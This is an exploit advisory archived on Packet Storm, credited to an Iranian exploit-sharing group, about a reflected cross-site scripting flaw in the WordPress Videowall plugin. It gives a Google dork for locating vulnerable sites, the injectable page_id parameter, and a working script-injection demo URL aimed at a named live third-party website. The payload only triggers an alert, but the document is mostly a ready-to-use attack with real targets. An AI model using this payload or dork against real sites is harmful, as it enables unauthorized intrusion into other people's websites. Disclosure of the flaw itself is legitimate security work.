WordPress Videowall plugin suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
f6f31fe986350433246709b3bbf6a821#################################
#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#
#####################################
# Exploit Title : Wordpress videowall Plugin Xss vulnerabilities
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Email : IeDb.Team@Gmail.com
# Home : http://iedb.ir - http://iedb.ir/acc
# Software Link : http://wordpress.org/
# Security Risk : High
# Tested on : Linux
# Dork : inurl:/wp-content/plugins/videowall/
#################################
# Exploit :
# http://site.com/wp-content/plugins/videowall/index.php?page_id=[Xss]
# Dem0 :
# http://neroqom.com/wp-content/plugins/videowall/index.php?page_id=8"><script>alert(/IeDb.Ir/)</script>
#################################
# Tnx To : All Member In Iedb.ir/acc & Iranian Hackers
#################################
# Exploit Archive = http://www.iedb.ir/exploits-716.html
#################################
© 2015 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!